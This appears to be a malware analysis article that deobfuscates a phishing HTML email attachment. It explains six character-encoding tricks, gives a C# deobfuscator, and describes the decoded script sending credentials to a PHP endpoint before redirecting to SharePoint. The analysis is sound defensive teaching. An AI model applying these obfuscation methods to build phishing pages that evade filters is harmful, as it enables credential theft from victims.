ethicalPhishing.HtmlDoc.Generic Sample Code Deobfuscation
Malware sample named COR15.1A (2).html (14938 bytes) has visited the laboratory.
This file was spreaded as e-mail attachment.
HTML markup and scripts are obfuscated and sometimes can pass through filters based on static analysis (rules).
Calculated checksum used for file identification is:
File: COR15.1A (2).html
Size: 14.59 KB (14938 bytes)
SHA-256: 72a230083a2942986f617d3553d8a12ca4d62fa8561d582afa12ed097dbfd699
Detection Ratio
Only 8 / 59 security vendors and no sandboxes flagged this file as malicious.
Reconnaissance
Infected web document (.html) is obfuscated by using various character escape codes. In this form the HTML markup and JavaScript code are difficult to read and understand.
When we look at the whole document, then we can see that there is 6 (six) types of encoding used.
Let us take the letter A as example.
This ASCII character can be encoded as 65 (decimal), 41 (hexadecimal) or 101 (octal).
If we want to insert A letter in HTML markup, then we can write decimal A
or hexadecimal A. What about scripts? We can use escape sequence character (backslash).
This way the (\u0064ocum\u0065n\u0074).write(); will render as document.write();.
Another type of encoding used here is URL encoding with % character and hexadecimal representation of ASCII character.
Obfuscated URL example can be following: https://ethical.blue/%41. This will link to https://ethical.blue/A.
Using URL encoding we can encode specific characters or even all characters.
Following this procedure the sample URL https%3a%2f%2fethical.blue%2fA will link to https://ethical.blue/A.
For automated URL decoding we can use for example Windows PowerShell:
[System.Web.HttpUtility]::UrlDecode('https://%65%74%68%69%63%61%6C%2E%62%6C%75%65');
Deobfuscator in C#.NET
After recognition of repeatable patterns in obfuscated code, we can write simple tool to clean up this sample.
/* Coded by ethical.blue Magazine. Cybersecurity clarified. */
using System.Text.RegularExpressions;
internal class Program
{
internal static string Deobfuscate(string text)
{
text = Regex.Replace(text, "\\\\[0-9]{1,3}", // \101
m => "&#x" + Convert.ToString(Convert.ToInt32(
m.Value.TrimStart("\\".ToCharArray()), 8), 16) + ";");
text = Regex.Replace(text, "\\\\u[0-9a-fA-F]{4}", // \u0041
m => (m.Value.Replace("\\u", "&#x") + ";"));
text = Regex.Replace(text, "\\\\x[0-9a-fA-F]{2}", // \x41
m => (m.Value.Replace("\\x", "&#x") + ";"));
text = Regex.Replace(text, "[%][0-9a-fA-F]{2}", // %41
m => "&#x" + m.Value.TrimStart("%".ToCharArray()) + ";");
text = Regex.Replace(text, "&#[xX][0-9a-fA-F]{1,4};", // A
m => string.Empty + Convert.ToChar(
Convert.ToInt32(
m.Value.TrimStart("&#x".ToCharArray())
.TrimEnd(';'), 16)));
text = Regex.Replace(text, "&#[0-9]{1,4};", // A
m => string.Empty + Convert.ToChar(
Convert.ToInt32(
m.Value.TrimStart("&#".ToCharArray())
.TrimEnd(';'), 10)));
return text;
}
private static void Main(string[] args)
{
const string root = @"C:\DATA\Malware Analysis\";
var clean = Deobfuscate(File.ReadAllText(Path.Combine(root, "sample.txt")));
File.WriteAllText(Path.Combine(root, "sample_clean.txt"), clean);
Console.WriteLine("Well done.");
}
}
Deobfuscated Code Static Analysis (JavaScript Payload)
This sample is typical phishing malware embedded in .html document. There is a try to imitate legitimate Microsoft services, but We will not unlock any document blurred in background. This is just a picture.
After our deobfuscator passed over the obfuscated code, we can read easily what is happening here.
There is asynchronous call ($.ajax) which sends provided credentials to API (.php script)
and performs redirection to legitimate Microsoft services (sharepoint.com) to mislead the victim.
Summary
General idea of this text is to provide educational value on deobfuscation of real malware sample found in the wild.
Bibliography
Size: 14.59 KB (14938 bytes)
SHA-256:
72a230083a2942986f617d3553d8a12ca4d62fa8561d582afa12ed097dbfd699